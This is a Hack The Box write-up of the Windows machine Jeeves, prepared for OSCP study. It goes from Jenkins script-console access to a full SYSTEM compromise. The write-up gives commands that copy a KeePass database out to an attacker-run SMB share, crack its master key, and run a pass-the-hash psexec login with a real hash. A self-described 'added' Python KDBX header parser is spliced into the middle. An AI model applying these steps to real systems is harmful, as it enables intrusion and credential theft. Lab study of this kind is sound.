OSCP PREPARATIONS – HTB Jeeves

Jeeves is a retired Hack The Box machine running Windows. The goal is to use its vulnerabilities to obtain the user and root flags.
We begin with an nmap scan to identify the services on the target machine.
Classic Scan

Full Port Scan

The port scan shows the following open ports: 80/tcp http Microsoft IIS httpd 10.0; 135/tcp msrpc Microsoft Windows RPC; 445/tcp microsoft-ds Microsoft Windows 7 – 10 microsoft-ds (workgroup: WORKGROUP); 50000/tcp http Jetty 9.4.z-SNAPSHOT.
We start by enumerating port 80.

We looked at the source code in the browser's developer mode and with Wappalyzer, but found nothing useful.
No matter what we type into the search box, the server keeps returning an error 🙂

We did not get any useful information here, so let's check for hidden files and directories with gobuster.

The directory scan did not reveal anything useful either, so let's move on.
Let's see whether port 50000 is serving HTTP.

Here we have Jetty. (Eclipse Jetty is a Java web server and Java Servlet container. While web servers are usually associated with serving documents to people, Jetty is now often used for machine-to-machine communication within larger software frameworks.)
We run a directory scan here as well.

We have detected the /askjeeves directory.
Let's go there.

Here we are logged into Jenkins immediately.
Since Jenkins is an automation server, the interface we are enumerating almost certainly gives some kind of direct access to the underlying machine. Under Manage Jenkins in the top-left menu there is a Script Console.

After clicking it:

We came across a Groovy script console, and I had no idea about this language.
The part that interests me is that it offers a shell screen through which I can access the machine.

Looking at the first GitHub page:

I use this code and run it:

We got a shell as user jeeves\kohsuke.

We now perform local enumeration to escalate to administrator privileges.
I go to the Documents directory.

I came across a .kdbx file, which I recognise as a KeePass database.

If I can recover the passwords in this database, I can get the root flag.
Let's transfer this database to our own machine.
First we start an SMB server on our attacker machine:
python3 /usr/share/doc/python3-impacket/examples/smbserver.py ma .

Then we copy the CEH.kdbx file from the target machine to the share (the share is a UNC path, so it needs two leading backslashes):
copy C:\Users\kohsuke\Documents\CEH.kdbx \\10.10.14.19\ma\CEH.kdbx

The database then arrives on our attacker machine.

Here we convert the kdbx file into a hash with the keepass2john tool
and try to crack it with john:
└─# keepass2john CEH.kdbx > hash_db
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash_db

Here we successfully cracked the master key as “moonshine1”.
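As an added, defender-side example that is not part of the original writeup: the outer header that keepass2john reads from a KDBX 3.x file can be parsed directly, which shows why the AES-KDF transform round count decides how quickly an exfiltrated database can be cracked offline with a wordlist as above. The sample header and the 100,000-round review threshold are constructed for this example; the signature, field IDs and AES cipher UUID are those of the KDBX 3.x format.

```python
import struct

# Added example (not the page's tooling): parse the KDBX 3.x outer header, the same
# fields keepass2john extracts, and flag a low AES-KDF round count.
KDBX_SIG1, KDBX_SIG2 = 0x9AA2D903, 0xB54BFB67
FIELD_NAMES = {2: "CipherID", 3: "CompressionFlags", 4: "MasterSeed", 5: "TransformSeed",
               6: "TransformRounds", 7: "EncryptionIV", 8: "ProtectedStreamKey",
               9: "StreamStartBytes", 10: "InnerRandomStreamID"}
WEAK_ROUNDS = 100_000  # assumed review threshold, not a KeePass-defined value


def parse_kdbx3_header(data: bytes) -> dict:
    """Parse the outer header of a KDBX 3.x file into {field name: value}."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", data, 0)
    if (sig1, sig2) != (KDBX_SIG1, KDBX_SIG2):
        raise ValueError("not a KDBX 2.x+ file")
    if major != 3:
        raise ValueError(f"unsupported KDBX major version {major}")
    fields, pos = {"version": (major, minor)}, 12
    while True:
        field_id, size = struct.unpack_from("<BH", data, pos)  # 1-byte ID, 2-byte length
        pos += 3
        payload = data[pos:pos + size]
        pos += size
        if field_id == 0:  # EndOfHeader; the encrypted payload starts at `pos`
            break
        name = FIELD_NAMES.get(field_id, f"Unknown{field_id}")
        fields[name] = struct.unpack("<Q", payload)[0] if field_id == 6 else payload
    fields["header_len"] = pos
    return fields


def assess_kdf(fields: dict) -> str:
    """'weak' if the AES-KDF round count is below the review threshold, else 'ok'."""
    return "weak" if fields["TransformRounds"] < WEAK_ROUNDS else "ok"


def _field(field_id: int, payload: bytes) -> bytes:
    return struct.pack("<BH", field_id, len(payload)) + payload


# Constructed sample header (not a real database): KDBX 3.1, AES-256, 6000 rounds
SAMPLE_KDBX = (
    struct.pack("<IIHH", KDBX_SIG1, KDBX_SIG2, 1, 3)
    + _field(2, bytes.fromhex("31c1f2e6bf714350be5805216afc5aff"))  # KeePass AES-256 UUID
    + _field(3, struct.pack("<I", 1))          # gzip compression
    + _field(4, b"\x11" * 32)                  # MasterSeed
    + _field(5, b"\x22" * 32)                  # TransformSeed
    + _field(6, struct.pack("<Q", 6000))       # TransformRounds (an old KeePass 2.x default)
    + _field(7, b"\x33" * 16)                  # EncryptionIV
    + _field(0, b"\r\n\r\n")                   # EndOfHeader
)
```

Run `parse_kdbx3_header(open("CEH.kdbx", "rb").read())` on a real KDBX 3.x file to see its round count; a low value is the reason a dictionary attack against a weak master password finishes quickly.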

We open the database with the keepassx tool.

This is how we accessed the stored entries.

Among the entries we found the following LM:NT hash (we tried the other passwords without a successful login):
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
Here we attempt a pass-the-hash attack using the psexec.py tool:
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 administrator@10.10.10.63 cmd.exe
We obtained a shell as nt authority\system.

We noticed that there is no flag in the Desktop folder, so let's look at the Alternate Data Streams to see whether the flag is hidden there.

This is how we got the root flag.
